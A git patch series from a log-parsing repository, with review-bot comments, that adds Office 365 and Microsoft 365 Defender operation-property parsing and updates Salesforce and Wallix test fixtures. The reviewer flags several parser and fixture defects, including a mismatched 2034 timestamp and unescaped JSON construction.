"{\"EVENT_TYPE\":\"Login\",\"TIMESTAMP\":\"20241026044641.024\",\"REQUEST_ID\":\"request_id_test\",\"ORGANIZATION_ID\":\"ORG_ID_TEST\",\"USER_ID\":\"USER_ID_TEST\",\"RUN_TIME\":\"47\",\"CPU_TIME\":\"12\",\"URI\":\"/services/oauth2/token\",\"SESSION_KEY\":\"\",\"LOGIN_KEY\":\"xxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"\",\"DB_TOTAL_TIME\":\"29963703\",\"LOGIN_TYPE\":\"i\",\"BROWSER_TYPE\":\"python-requests/2.28.0\",\"API_TYPE\":\"\",\"API_VERSION\":\"9998.0\",\"USER_NAME\":\"user.integration@test.com\",\"TLS_PROTOCOL\":\"TLSv1.3\",\"CIPHER_SUITE\":\"TLS_AES_256_GCM_SHA384\",\"LOGIN_URL\":\"test.my.salesforce.com\",\"AUTHENTICATION_METHOD_REFERENCE\":\"\",\"LOGIN_SUB_TYPE\":\"oauthclientcredentials\",\"AUTHENTICATION_SERVICE_ID\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-26T04:46:41.024Z\",\"USER_ID_DERIVED\":\"USER_ID_TEST_IA4\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\",\"LOGIN_STATUS\":\"LOGIN_NO_ERROR\",\"SOURCE_IP\":\"1.2.3.4\",\"FORWARDED_FOR_IP\":\"\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "Login", + "type": [ + "start" + ] + }, + "@timestamp": "2034-02-21T02:43:24.464103Z", + "organization": { + "id": "ORG_ID_TEST" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "salesforce": { + "api": { + "version": "9998.0" + }, + "login": { + "key": "xxxxxxxxxxxxx", + "status": "LOGIN_NO_ERROR", + "sub_type": "oauthclientcredentials" + }, + "request": { + "id": "request_id_test" + }, + "user": { + "type": "Standard" + } + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "tls": { + "cipher": "TLS_AES_256_GCM_SHA384", + "version": "TLSv1.3" + }, + "url": { + "original": "test.my.salesforce.com", + "path": "/services/oauth2/token" + }, + "user": { + "email": "user.integration@test.com", + "id": "USER_ID_TEST" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Python Requests", + "original": "python-requests/2.28.0", + "os": { + "name": "Other" + }, + "version": "2.28" + } + } +} \ 
No newline at end of file diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 39e8a6363..1c01481e9 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,13 +6,19 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": ["session"], + "category": [ + "session" + ], "dataset": "session_integrity", "outcome": "failure", - "type": ["info"] + "type": [ + "info" + ] }, "related": { - "user": ["adm@CORP.NET@1.1.1.1"] + "user": [ + "adm@CORP.NET@1.1.1.1" + ] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -21,4 +27,4 @@ "type": "SSH_SHELL_SESSION" } } -} +} \ No newline at end of file From 8ae4ab6122886eb074acbfd38cfba1780259d7f1 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Tue, 12 Nov 2024 13:21:11 +0200 Subject: [PATCH 215/317] rollback other --- Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 1c01481e9..39e8a6363 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json 
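Review bot: The expected `@timestamp` of `2034-02-21T02:43:24.464103Z` does not match the input, whose `TIMESTAMP` is `20241026044641.024` and `TIMESTAMP_DERIVED` is `2024-10-26T04:46:41.024Z`; the fixture pins a value roughly ten years in the future, which looks like a timestamp-parsing defect in the parser (outside this hunk) being enshrined rather than caught. The expected value should read `"@timestamp": "2024-10-26T04:46:41.024000Z"`, and the parser should take `TIMESTAMP_DERIVED` (already RFC 3339) or parse `TIMESTAMP` with an explicit `%Y%m%d%H%M%S.%f` format. The file also lacks a trailing newline.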
@@ -6,19 +6,13 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": [ - "session" - ], + "category": ["session"], "dataset": "session_integrity", "outcome": "failure", - "type": [ - "info" - ] + "type": ["info"] }, "related": { - "user": [ - "adm@CORP.NET@1.1.1.1" - ] + "user": ["adm@CORP.NET@1.1.1.1"] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -27,4 +21,4 @@ "type": "SSH_SHELL_SESSION" } } -} \ No newline at end of file +} From 7de6200578c1e1cf707f61343f99b60d962cdf82 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 12 Nov 2024 16:54:59 +0100 Subject: [PATCH 216/317] [Improvement] microsoft 365 / office 365 logs : Addition of operation properties --- .vscode/settings.json | 22 +++++ .../microsoft-365-defender/_meta/fields.yml | 5 + .../microsoft-365-defender/ingest/parser.yml | 15 +++ .../tests/test_cloud_app3.json | 6 ++ Office 365/o365/_meta/fields.yml | 6 ++ Office 365/o365/ingest/parser.yml | 15 +++ Office 365/o365/tests/clientipadress.json | 6 ++ .../o365/tests/exchange_item_aggregated.json | 6 ++ .../o365/tests/operation_properties_01.json | 91 +++++++++++++++++++ .../o365/tests/operation_properties_02.json | 88 ++++++++++++++++++ 10 files changed, 260 insertions(+) create mode 100644 .vscode/settings.json create mode 100644 Office 365/o365/tests/operation_properties_01.json create mode 100644 Office 365/o365/tests/operation_properties_02.json diff --git a/.vscode/settings.json b/.vscode/settings.json new file mode 100644 index 000000000..b92839d53 --- /dev/null +++ b/.vscode/settings.json 
@@ -0,0 +1,22 @@ +{ + "workbench.colorCustomizations": { + "activityBar.activeBackground": "#65c89b", + "activityBar.background": "#65c89b", + "activityBar.foreground": "#15202b", + "activityBar.inactiveForeground": "#15202b99", + "activityBarBadge.background": "#945bc4", + "activityBarBadge.foreground": "#e7e7e7", + "commandCenter.border": "#15202b99", + "sash.hoverBorder": "#65c89b", + "statusBar.background": "#42b883", + "statusBar.foreground": "#15202b", + "statusBarItem.hoverBackground": "#359268", + "statusBarItem.remoteBackground": "#42b883", + "statusBarItem.remoteForeground": "#15202b", + "titleBar.activeBackground": "#42b883", + "titleBar.activeForeground": "#15202b", + "titleBar.inactiveBackground": "#42b88399", + "titleBar.inactiveForeground": "#15202b99" + }, + "peacock.color": "#42b883" +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index 3a95175de..f69ef372d 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml @@ -777,6 +777,11 @@ microsoft.defender.observer.interface.type: name: microsoft.defender.observer.interface.type type: keyword +microsoft.defender.operation.properties: + description: Additional properties of the operation + name: microsoft.defender.operation.properties + type: object + microsoft.defender.report.id: description: Unique identifier for the event name: microsoft.defender.report.id diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index f22b21ce1..39d179145 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
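Review bot: `.vscode/settings.json` is a personal editor configuration (Peacock colour customisations) unrelated to the parser changes in this commit, and committing it imposes these colours on every contributor who opens the repository; it should be dropped from the commit and the path ignored, e.g. a `.vscode/` entry in `.gitignore`. The file also lacks a trailing newline.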
@@ -259,6 +259,21 @@ stages: - set: network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' + - set: + microsoft.defender.operation.properties: > + { + {%- for property in json_event.message.properties.RawEventData.OperationProperties -%} + {%- if property.Value != null -%} + {%- if property.Value | from_json == None -%} + "{{property.Name}}":"{{property.Value}}", + {%- else -%} + "{{property.Name}}": {{property.Value | from_json}}, + {%- endif -%} + {%- endif -%} + {%- endfor -%} + } + filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' + set_alert_evidence_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json index d60cc39a1..764942b33 100644 --- a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json +++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json @@ -84,6 +84,12 @@ ], "type": "Run" }, + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "report": { "id": "98261974_20893_f747c19c-0664-45c8-aac9-8f16e7714de1" } diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml index 96bb48e86..190ce038e 100644 --- a/Office 365/o365/_meta/fields.yml +++ b/Office 365/o365/_meta/fields.yml @@ -408,6 +408,12 @@ office365.logon_error: name: office365.logon_error type: keyword + +office365.operation.properties: + description: A list of objects describing the operation + name: office365.operation.properties + type: object + office365.record_type: description: The type of the operation name: office365.record_type 
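Review bot: `microsoft.defender.operation.properties` is assembled as JSON text by string concatenation inside the template — `"{{property.Name}}":"{{property.Value}}",` writes `Value` unescaped, so a value containing a double quote or backslash that is not itself valid JSON produces malformed output, and the loop always leaves a trailing comma before the closing `}`, which strict JSON parsers reject. Applying `from_json` to every value also makes the per-key type unstable (`"-123"` becomes a number while `"Enabled"` stays a string), which is awkward for a field declared as `object`. The same construction appears in `office365.operation.properties` in the `Office 365/o365/ingest/parser.yml` hunk of this commit and the remarks apply there too. `property.Value != null` relies on `null` not being a Jinja literal (the literal is `none`), which is what currently skips entries without a `Value`; `is defined` states that explicitly. Building a dict and emitting it whole avoids the escaping and trailing-comma problems, as sketched below, provided the engine accepts a dict rendered by `{{props}}` as a `set` value — confirm against how other `set` values are consumed.
```yaml
- set:
    microsoft.defender.operation.properties: >
      {%- set props = {} -%}
      {%- for property in json_event.message.properties.RawEventData.OperationProperties -%}
        {%- if property.Value is defined and property.Value != None -%}
          {%- set _ = props.update({property.Name: property.Value}) -%}
        {%- endif -%}
      {%- endfor -%}
      {{props}}
    filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}'
# … unchanged: set_alert_evidence_fields stage …
```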
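Review bot: The description `A list of objects describing the operation` on `office365.operation.properties` describes the raw `OperationProperties` array, but the parser in this commit renders the field as a single object keyed by property `Name` and the field is declared `type: object`; the description should match what is stored, e.g. `description: Operation properties keyed by name (from OperationProperties)`. The `fields.yml` file continues outside the hunk.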
diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 62a4098df..879592c7b 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -118,6 +118,21 @@ stages: office365.audit.object_id: "{{json_event.message.ObjectId}}" office365.virus_info: "{{json_event.message.VirusInfo}}" office365.virus_vendor: "{{json_event.message.VirusVendor}}" + - set: + office365.operation.properties: > + { + {%- for property in json_event.message.OperationProperties -%} + {%- if property.Value != null -%} + {%- if property.Value | from_json == None -%} + "{{property.Name}}":"{{property.Value}}", + {%- else -%} + "{{property.Name}}": {{property.Value | from_json}}, + {%- endif -%} + {%- endif -%} + {%- endfor -%} + } + filter: '{{json_event.message.get("OperationProperties") != None}}' + - translate: dictionary: 0: "Regular" diff --git a/Office 365/o365/tests/clientipadress.json b/Office 365/o365/tests/clientipadress.json index c20107759..8555c1c9d 100644 --- a/Office 365/o365/tests/clientipadress.json +++ b/Office 365/o365/tests/clientipadress.json @@ -23,6 +23,12 @@ "target": "user" }, "office365": { + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "record_type": 50, "result_status": "Succeeded", "user_type": { diff --git a/Office 365/o365/tests/exchange_item_aggregated.json b/Office 365/o365/tests/exchange_item_aggregated.json index 11cbfdefc..c15d8da5b 100644 --- a/Office 365/o365/tests/exchange_item_aggregated.json +++ b/Office 365/o365/tests/exchange_item_aggregated.json @@ -20,6 +20,12 @@ "context": { "aad_session_id": "dcdad6b2-f279-48c6-9ed8-3df0ffde4ece" }, + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "record_type": 50, "result_status": "Succeeded", "user_type": { 
diff --git a/Office 365/o365/tests/operation_properties_01.json b/Office 365/o365/tests/operation_properties_01.json new file mode 100644 index 000000000..8354f4415 --- /dev/null +++ b/Office 365/o365/tests/operation_properties_01.json 
@@ -0,0 +1,91 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" + } + }, + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}" + }, + "expected": { + "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "event": { + "action": "UpdateInboxRules", + "category": [ + "email", + "file" + ], + "code": "2", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T10:34:13Z", + "action": { + "id": 2, + "name": "UpdateInboxRules", + "outcome": "success", + "target": "user" + 
}, + "office365": { + "context": { + "aad_session_id": "xxxx-xxx-xxx-xxxx" + }, + "exchange": { + "mailbox_guid": "xxxx-xxx-xxx-xxxx" + }, + "operation": { + "properties": { + "RuleActions": [ + { + "ActionType": "Forward", + "ForwardFlags": "None", + "Recipients": [ + "john.doe@mail.fr", + "user@email.fr", + "asmithee@mailbox.fr", + "user.name@mail.fr" + ] + } + ], + "RuleCondition": "{(Exists(ItemClass))}", + "RuleId": -123, + "RuleOperation": "ModifyMailboxRule", + "RuleProvider": "RuleOrganizer", + "RuleState": "Enabled" + } + }, + "record_type": 2, + "result_status": "Succeeded", + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "xxxx-xxx-xxx-xxxx" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@mail.fr" + ] + }, + "service": { + "name": "Exchange" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@mail.fr", + "id": "S-1-2-3-4", + "name": "john.doe@mail.fr" + } + } +} \ No newline at end of file diff --git a/Office 365/o365/tests/operation_properties_02.json b/Office 365/o365/tests/operation_properties_02.json new file mode 100644 index 000000000..7f11fadc3 --- /dev/null +++ b/Office 365/o365/tests/operation_properties_02.json 
@@ -0,0 +1,88 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" + } + }, + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}" + }, + "expected": { + "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "event": { + "action": "UpdateInboxRules", + "category": [ + "email", + "file" + ], + "code": "2", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-23T12:26:18Z", + "action": { + "id": 2, + "name": 
"UpdateInboxRules", + "outcome": "success", + "target": "user" + }, + "office365": { + "context": { + "aad_session_id": "xxxx-xxx-xxx-xxxx" + }, + "exchange": { + "mailbox_guid": "xxxx-xxx-xxx-xxxx" + }, + "operation": { + "properties": { + "RuleActions": [ + { + "ActionType": "Forward", + "ForwardFlags": "None", + "Recipients": [ + "user.name@mail.fr" + ] + } + ], + "RuleCondition": "{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}", + "RuleId": 4561233110666051585, + "RuleOperation": "ModifyMailboxRule", + "RuleProvider": "RuleOrganizer", + "RuleState": "Enabled" + } + }, + "record_type": 2, + "result_status": "Succeeded", + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "xxxx-xxx-xxx-xxxx" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@mail.fr" + ] + }, + "service": { + "name": "Exchange" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@mail.fr", + "id": "S-1-2-3", + "name": "john.doe@mail.fr" + } + } +} \ No newline at end of file From a4fd269ed55b824e5c811577722dce79d9611c29 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 12 Nov 2024 16:58:53 +0100 Subject: [PATCH 217/317] fix on linting --- Microsoft/microsoft-365-defender/ingest/parser.yml | 2 +- Office 365/o365/_meta/fields.yml | 1 - Office 365/o365/ingest/parser.yml | 2 +- Office 365/o365/tests/operation_properties_01.json | 4 ++-- Office 365/o365/tests/operation_properties_02.json | 4 ++-- 5 files changed, 6 insertions(+), 7 deletions(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 39d179145..2a8b6655f 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
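Review bot: The expected block pins `"RuleId": 4561233110666051585` as a JSON number, which is above 2^53 and therefore not exactly representable by consumers that parse numbers as IEEE doubles (JavaScript, jq, many JSON clients); the fixture thereby locks in the precision-losing conversion instead of guarding against it. If the parser is changed to keep identifiers as strings, this expectation should become `"RuleId": "4561233110666051585"`, matching the raw value in the message. The test otherwise usefully covers a `RuleName` entry without a `Value`, which is correctly absent from the expected properties.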
@@ -273,7 +273,7 @@ stages: {%- endfor -%} } filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' - + set_alert_evidence_fields: actions: - set: diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml index 190ce038e..02c13a28b 100644 --- a/Office 365/o365/_meta/fields.yml +++ b/Office 365/o365/_meta/fields.yml @@ -408,7 +408,6 @@ office365.logon_error: name: office365.logon_error type: keyword - office365.operation.properties: description: A list of objects describing the operation name: office365.operation.properties diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 879592c7b..b65d6f8e6 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -132,7 +132,7 @@ stages: {%- endfor -%} } filter: '{{json_event.message.get("OperationProperties") != None}}' - + - translate: dictionary: 0: "Regular" diff --git a/Office 365/o365/tests/operation_properties_01.json b/Office 365/o365/tests/operation_properties_01.json index 8354f4415..790c6b45f 100644 --- a/Office 365/o365/tests/operation_properties_01.json +++ b/Office 365/o365/tests/operation_properties_01.json 
